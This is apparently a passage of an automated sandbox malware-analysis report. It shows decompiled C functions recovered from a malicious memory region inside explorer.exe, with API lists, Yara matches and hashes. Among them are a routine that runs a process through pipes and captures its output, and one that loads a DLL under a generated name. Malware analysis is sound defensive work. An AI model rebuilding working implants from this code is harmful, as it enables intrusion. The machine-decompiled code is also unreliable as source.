				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L00092285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L000922CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E00088706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x909b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}














                            0x00092125
                            0x0009212a
                            0x0009212e
                            0x0009212e
                            0x00092133
                            0x00092138
                            0x00092139
                            0x0009213c
                            0x0009213d
                            0x00092142
                            0x00092145
                            0x00092146
                            0x0009214b
                            0x00092152
                            0x000921f8
                            0x000921f8
                            0x00000000
                            0x00092161
                            0x00092161
                            0x00092168
                            0x0009216c
                            0x00092173
                            0x0009217c
                            0x0009217e
                            0x0009217e
                            0x0009217c
                            0x0009218d
                            0x000921b3
                            0x000921bc
                            0x000921be
                            0x000921c4
                            0x000921f3
                            0x000921f3
                            0x000921fb
                            0x000921fe
                            0x000921fe
                            0x000921c6
                            0x000921c7
                            0x000921cd
                            0x000921cf
                            0x000921cf
                            0x000921d4
                            0x000921d3
                            0x000921d3
                            0x000921db
                            0x000921e7
                            0x000921f1
                            0x000921f1
                            0x00000000
                            0x0009219d
                            0x0009219d
                            0x0009219d
                            0x000921a3
                            0x00000000
                            0x00000000
                            0x000921a5
                            0x000921ab
                            0x000921b0
                            0x00000000
                            0x000921b0
                            0x0009218d

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: strchr$_snprintflocaleconv
                            • String ID: %.*g
                            • API String ID: 1910550357-952554281
                            • Opcode ID: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                            • Instruction ID: 1807b53470dfa9210b137be6f10a1510799a81b613ee7934cd0fe15d2e85ebbb
                            • Opcode Fuzzy Hash: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                            • Instruction Fuzzy Hash: 8E216A766047427ADF259A28DCC6BEA3BDCDF25330F150155FE509A182EA74EC60B3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000902B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: _snprintfqsort
                            • String ID: %I64d$false$null$true
                            • API String ID: 756996078-4285102228
                            • Opcode ID: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                            • Instruction ID: e8f87335b98eb15e4b72e6aadc3c6444a94586e470a32963d335527edd021b66
                            • Opcode Fuzzy Hash: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                            • Instruction Fuzzy Hash: F1E17DB190020ABFDF119F64CC46EEF3BA9EF55384F108019FE1596152EB31DA61EBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008D748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(00000000), ref: 0008D75C
                            • SysAllocString.OLEAUT32(?), ref: 0008D764
                            • SysAllocString.OLEAUT32(00000000), ref: 0008D778
                            • SysFreeString.OLEAUT32(?), ref: 0008D7F3
                            • SysFreeString.OLEAUT32(?), ref: 0008D7F6
                            • SysFreeString.OLEAUT32(?), ref: 0008D7FB
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: String$AllocFree
                            • String ID:
                            • API String ID: 344208780-0
                            • Opcode ID: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                            • Instruction ID: a89b29efd16a02d44f6d8e25ac1661f5a2b1d21aaf5940480051179919990030
                            • Opcode Fuzzy Hash: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                            • Instruction Fuzzy Hash: 1821F975900218AFDB10EFA5CC88DAFBBBDFF48654B10449AF505E7250DA71AE01CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000907F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: @$\u%04X$\u%04X\u%04X
                            • API String ID: 0-2132903582
                            • Opcode ID: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                            • Instruction ID: fcde36fe93850f7dd9ad1ae31ae76e92f94782fe824cdb2d7e9ac6baa3171ba9
                            • Opcode Fuzzy Hash: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                            • Instruction Fuzzy Hash: C6411931700205EFEF784A9CCD9ABBF2AA8DF45340F244125F986D6396DA61CD91B3D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008D523, Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 30%
                            			E0008D523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x9b848, 0, 1, 0x9b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E00088604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













                            0x0008d530
                            0x0008d533
                            0x0008d536
                            0x0008d547
                            0x0008d54d
                            0x0008d55e
                            0x0008d566
                            0x0008d5b7
                            0x0008d5b7
                            0x0008d5bc
                            0x0008d5c1
                            0x0008d5c1
                            0x0008d5c4
                            0x0008d5c9
                            0x0008d5ce
                            0x0008d5ce
                            0x0008d5d1
                            0x0008d568
                            0x0008d569
                            0x0008d56f
                            0x0008d580
                            0x0008d585
                            0x00000000
                            0x0008d587
                            0x0008d594
                            0x0008d59c
                            0x00000000
                            0x0008d59e
                            0x0008d5a0
                            0x0008d5a8
                            0x00000000
                            0x0008d5aa
                            0x0008d5ad
                            0x0008d5b3
                            0x0008d5b3
                            0x0008d5a8
                            0x0008d59c
                            0x0008d585
                            0x0008d5d6

                            APIs
                            • CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                            • CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                            • SysAllocString.OLEAUT32(00000000), ref: 0008D569
                            • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                            • String ID:
                            • API String ID: 1610782348-0
                            • Opcode ID: 61e718e46d9626c6fc607ac76e9c554d5449760960f597cd4dce1a0c96a4aa07
                            • Instruction ID: 5ca9e363416111ca0ccf9453dcb24a0453d396344b9ddfdbf921160754929c58
                            • Opcode Fuzzy Hash: 61e718e46d9626c6fc607ac76e9c554d5449760960f597cd4dce1a0c96a4aa07
                            • Instruction Fuzzy Hash: 6F21E970600245BBEB249B66DC4DE6FBFBCFFC6B25F10415EB541A62A0DA709A01CB30
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000921FF, Relevance: 7.6, APIs: 5, Instructions: 52stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 79%
                            			E000921FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L000922CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L00092291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x98250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L00092291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x98258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}











                            0x000921ff
                            0x00092207
                            0x0009220c
                            0x0009220f
                            0x00092214
                            0x0009221a
                            0x00092223
                            0x00092227
                            0x00092227
                            0x00092223
                            0x00092229
                            0x0009222e
                            0x00092237
                            0x0009223c
                            0x0009223f
                            0x00092248
                            0x0009224a
                            0x00092251
                            0x00092262
                            0x00092262
                            0x00092264
                            0x0009226c
                            0x00092273
                            0x00000000
                            0x0009226e
                            0x00092272
                            0x00092272
                            0x00092253
                            0x00092253
                            0x00092259
                            0x0009225b
                            0x00092260
                            0x00092276
                            0x00092279
                            0x0009227e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00092260

                            APIs
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: _errno$localeconvstrchrstrtod
                            • String ID:
                            • API String ID: 1035490122-0
                            • Opcode ID: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                            • Instruction ID: 9be57ecffa989f7d2828815fae2d17a9d7f4e019258d81125002a8d3572c8328
                            • Opcode Fuzzy Hash: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                            • Instruction Fuzzy Hash: 7701F239904205FADF127F24E9057DD7BA8AF4B360F2041D1E9D0A61E2DB759854E7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008A9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177pipeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 73%
                            			E0008A9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E0008861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x9e684; // 0xc2f8f0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x9e684; // 0xc2f8f0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E00088604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x9e684; // 0xc2f8f0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x9e684; // 0xc2f8f0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x9e684; // 0xc2f8f0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x9e684; // 0xc2f8f0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E000891A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E00089292(_t127);
						E0008861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E0008C379(_t127));
				_t98 =  *0x9e68c; // 0xc2fab8
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x9e684; // 0xc2f8f0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x9e684; // 0xc2f8f0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E00089256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E0008861A( &_v32, 0);
				return _t128;
			}




































                            0x0008a9c2
                            0x0008a9c4
                            0x0008a9d0
                            0x0008a9d5
                            0x0008a9d8
                            0x0008a9da
                            0x0008a9dd
                            0x0008a9e0
                            0x0008a9e7
                            0x0008a9ea
                            0x0008a9f1
                            0x0008a9f4
                            0x0008a9fe
                            0x0008a9ff
                            0x0008aa02
                            0x0008aa04
                            0x0008aa05
                            0x0008aa1c
                            0x0008ab9c
                            0x00000000
                            0x0008ab9c
                            0x0008aa33
                            0x0008ab68
                            0x0008ab6e
                            0x0008ab79
                            0x0008ab7b
                            0x0008ab83
                            0x0008ab83
                            0x0008ab8a
                            0x0008ab8c
                            0x0008ab95
                            0x0008ab95
                            0x00000000
                            0x0008ab98
                            0x0008aa39
                            0x0008aa3c
                            0x0008aa3f
                            0x0008aa45
                            0x0008aa4f
                            0x0008aa59
                            0x0008aa60
                            0x0008aa69
                            0x0008aa6b
                            0x0008aa71
                            0x00000000
                            0x00000000
                            0x0008aa7c
                            0x0008aa83
                            0x0008aa84
                            0x0008aa89
                            0x0008aa8a
                            0x0008aa8b
                            0x0008aa90
                            0x0008aa92
                            0x0008aa93
                            0x0008aa94
                            0x0008aa97
                            0x0008aa9d
                            0x00000000
                            0x00000000
                            0x0008aaa3
                            0x0008aaab
                            0x0008aaae
                            0x0008aab6
                            0x0008aab9
                            0x0008aabc
                            0x0008aac2
                            0x0008aad6
                            0x0008aadc
                            0x0008aae2
                            0x0008ab0b
                            0x0008aae4
                            0x0008aae4
                            0x0008aae6
                            0x0008aae8
                            0x0008aaf0
                            0x0008aaf8
                            0x0008aafd
                            0x0008aafd
                            0x0008ab11
                            0x0008ab13
                            0x0008ab13
                            0x0008ab1b
                            0x0008ab23
                            0x0008ab24
                            0x0008ab29
                            0x0008ab32
                            0x0008ab52
                            0x0008ab52
                            0x0008ab5a
                            0x0008ab5d
                            0x0008ab65
                            0x00000000
                            0x0008ab65
                            0x0008ab3b
                            0x0008ab3f
                            0x00000000
                            0x00000000
                            0x0008ab47
                            0x00000000

                            APIs
                            • memset.MSVCRT ref: 0008A9F4
                            • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 0008AA18
                            • CreatePipe.KERNEL32(000865A9,?,0000000C,00000000), ref: 0008AA2F
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                              • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateHeapPipe$AllocateFreememset
                            • String ID: D
                            • API String ID: 2365139273-2746444292
                            • Opcode ID: 67bc10a6decf753f6dac1e13afc2d66274f75466a29843fca943c411748d35ce
                            • Instruction ID: 1038731307509bc63423b83b895d9a6edc7a8df2068bd220f00375d18a9fab8d
                            • Opcode Fuzzy Hash: 67bc10a6decf753f6dac1e13afc2d66274f75466a29843fca943c411748d35ce
                            • Instruction Fuzzy Hash: 3A512C72E00209AFEB51EFA4CC45FDEBBB9BB08300F14416AF544E7152EB7499048B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008C4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117libraryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E0008C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x9e688; // 0xb0000
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E000895E1(_t50, 0xb62);
					_t66 =  *0x9e688; // 0xb0000
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E00089640( &_v140, 0x40, L"%08x", E0008D400(_t66 + 0xb0, E0008C379(_t66 + 0xb0), 0));
					_t20 =  *0x9e688; // 0xb0000
					asm("sbb eax, eax");
					_t25 = E000895E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x9e688; // 0xb0000
					_t68 = E000892E5(_t26 + 0x1020);
					_v12 = _t68;
					E000885D5( &_v8);
					_t32 =  *0x9e688; // 0xb0000
					_t34 = E000892E5(_t32 + 0x122a);
					 *0x9e784 = _t34;
					_t35 =  *0x9e684; // 0xc2f8f0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x9e784);
					 *0x9e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E0008E171(0x9bb48, _t60);
					}
					 *0x9e780 = _t38;
					E0008861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x9e780 != 0) {
						goto L10;
					} else {
						E0008861A(0x9e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x9e780 == 0) {
						_t46 = E0009E6BC; // 0xc2fa18
						 *0x9e780 = _t46;
					}
					L10:
					return 1;
				}
			}


























                            0x0008c4ce
                            0x0008c4ce
                            0x0008c4ce
                            0x0008c4d1
                            0x0008c4dd
                            0x0008c4e8
                            0x0008c504
                            0x0008c509
                            0x0008c512
                            0x0008c514
                            0x0008c51c
                            0x0008c53d
                            0x0008c542
                            0x0008c54f
                            0x0008c55a
                            0x0008c561
                            0x0008c568
                            0x0008c579
                            0x0008c57f
                            0x0008c582
                            0x0008c599
                            0x0008c5a5
                            0x0008c5ad
                            0x0008c5b4
                            0x0008c5ba
                            0x0008c5c6
                            0x0008c5cc
                            0x0008c5d3
                            0x0008c5e6
                            0x0008c5d5
                            0x0008c5d5
                            0x0008c5d8
                            0x0008c5de
                            0x0008c5e3
                            0x0008c5e8
                            0x0008c5f3
                            0x0008c605
                            0x0008c617
                            0x00000000
                            0x0008c619
                            0x0008c620
                            0x00000000
                            0x0008c626
                            0x0008c627
                            0x0008c627
                            0x0008c62e
                            0x0008c630
                            0x0008c635
                            0x0008c635
                            0x0008c63a
                            0x0008c63e
                            0x0008c63e

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoadmemset
                            • String ID: %08x$dll
                            • API String ID: 3406617148-2963171978
                            • Opcode ID: d0cc9968a293dd3dfd5a1183e1ba6c410fd70592b1cb07f3e9d2906c3aa602dc
                            • Instruction ID: f3dd22374d708548471efb5ddff1d4c344fbc2453a9af2a3a2ac9a4f9c61bf9a
                            • Opcode Fuzzy Hash: d0cc9968a293dd3dfd5a1183e1ba6c410fd70592b1cb07f3e9d2906c3aa602dc
                            • Instruction Fuzzy Hash: BB31B3B2A00244BBFB10FBA8EC89FAA73ACFB54354F544036F145D7192EB789D418725
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00092D70, Relevance: 6.6, APIs: 5, Instructions: 341COMMON
                            Download Yara Rule
                            C-Code - Quality: 99%
                            			E00092D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E00095D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E00094AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E00094C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
